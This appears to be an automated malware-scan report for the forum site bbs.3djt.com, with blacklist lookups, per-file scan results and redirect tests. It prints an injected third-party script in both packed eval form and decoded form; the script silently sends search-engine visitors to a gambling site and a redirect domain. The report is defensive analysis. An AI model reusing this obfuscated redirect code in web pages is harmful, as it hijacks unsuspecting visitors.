Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bbs.3djt.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bbs.3djt.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bbs.3djt.com/ | 200 OK Content-Length: 6906 Content-Type: text/html | clean |
http://ad.baidusohu.com/123.js | 200 OK Content-Length: 396 Content-Type: application/x-javascript | clean |
http://api.discuz.com.de/Seo.js | 200 OK Content-Length: 702 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: cnrdn.com eval(function(p,a,c,k,e,r){e=function(c){return c.toString(36)};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[02-79a-g]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3(4.7.9(\'a\')==-1){0 2=new Date();2.setTime(2.getTime()+8);4.7=\'a=1;expires=\'+2.toGMTString();0 b=4.referrer;0 5=[\'baidu\',\'google\',\'yahoo\',\'bing\',\'soso\',\'sogou\',\'360.cn\',\'so.c\',\'youdao\',\'anquan\'];for(0 i in 5){3(b.9(5[i])!=-1){3(d.6.e){d.6.e.f=\'g://www.bocai.ch/\'};6.f.href=\'g://cnrdn.c/AtDE\'}}}',[],17,'var||exp|if|document|bot|window|cookie||indexOf|whoami|ref|com|parent|opener|location|http'.split('|'),0,{})) Decoded script: if(document.cookie.indexOf('whoami')==-1){var exp=new Date();exp.setTime(exp.getTime()+8);document.cookie='whoami=1;expires='+exp.toGMTString();var ref=document.referrer;var bot=['baidu','google','yahoo','bing','soso','sogou','360.cn','so.com','youdao','anquan'];for(var i in bot){if(ref.indexOf(bot[i])!=-1){if(parent.window.opener){parent.window.opener.location='http://www.bocai.ch/'};window.location.href='http://cnrdn.com/AtDE'}}} if(document.cookie.indexOf('whoami')==-1){var exp=new Date();exp.setTime(exp.getTime()+8);document.cookie='whoami=1;expires='+exp.toGMTString();var ref=document.referrer;var bot=['baidu','google','yahoo','bing','soso','sogou','360.cn','so.com','youdao','anquan'];for(var i in bot){if(ref.indexOf(bot[i])!=-1){if(parent.window.opener){parent.window.opener.location='http://www.bocai.ch/'};window.location.href='http://cnrdn.com/AtDE'}}} | ||
http://bbs.3djt.com/./index.aspx | 404 Not Found Content-Length: 571 Content-Type: text/html | clean |
http://bbs.3djt.com/test404page.js | 404 Not Found Content-Length: 571 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bbs.3djt.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Jul 2014 18:02:01 GMT
Accept-Ranges: bytes
Server: nginx/0.8.46
Vary: Accept-Encoding
Content-Length: 6906
Content-Type: text/html
Last-Modified: Wed, 16 Jul 2014 09:08:02 GMT
...6906 bytes of data.
GET / HTTP/1.1
Host: bbs.3djt.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Jul 2014 18:02:01 GMT
Accept-Ranges: bytes
Server: nginx/0.8.46
Vary: Accept-Encoding
Content-Length: 6906
Content-Type: text/html
Last-Modified: Wed, 16 Jul 2014 09:08:02 GMT
...6906 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bbs.3djt.com
Referer: http://www.google.com/search?q=bbs.3djt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bbs.3djt.com
Referer: http://www.google.com/search?q=bbs.3djt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.